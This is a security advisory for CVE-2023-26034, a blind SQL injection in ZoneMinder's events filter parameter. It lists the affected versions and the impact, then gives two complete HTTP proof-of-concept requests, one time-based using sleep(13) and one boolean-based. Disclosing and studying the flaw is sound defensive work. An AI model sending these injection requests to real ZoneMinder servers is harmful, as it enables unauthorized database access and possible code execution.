CVE-2023-26034 - SQL Injection in zoneminder/zoneminder
Table of Contents
Description #
ZoneMinder is a free, open-source, closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are affected by a SQL Injection vulnerability. The (blind) SQL Injection vulnerability is present within the filter[Query][terms][0][attr] query string parameter of the /zm/index.php endpoint. A user with the View or Edit permissions of Events may execute arbitrary SQL. The resulting impact can include unauthorized data access (and modification), authentication and/or authorization bypass, and remote code execution.
Proof of Concept #
A time-based proof of concept payload using the MariaDB sleep function, as follows:
GET http://zoneminder.local/zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId%20/%20sleep(13)&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5BQuery%5D%5Bsort_asc%5D=1&filter%5BQuery%5D%5Bsort_field%5D=StartDateTime&filter%5BQuery%5D%5Blimit%5D=0 HTTP/1.1
Host: zoneminder.local
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 0
Cookie: zmSkin=classic; zmCSS=base; ZMSESSID=9enmm5uqte0tqt3dgq7447odh9
A boolean-based proof of concept with a resultant true query (AND 1=1), as follows:
GET http://zoneminder.local/zm/index.php?view=request&request=events&task=query&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=MonitorId)%20AND%20(1=1&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D==&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=1 HTTP/1.1
Host: zoneminder.local
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 0
Cookie: zmSkin=classic; zmCSS=base; ZMSESSID=cmllgeglf6h0jbetb9kvkjet2u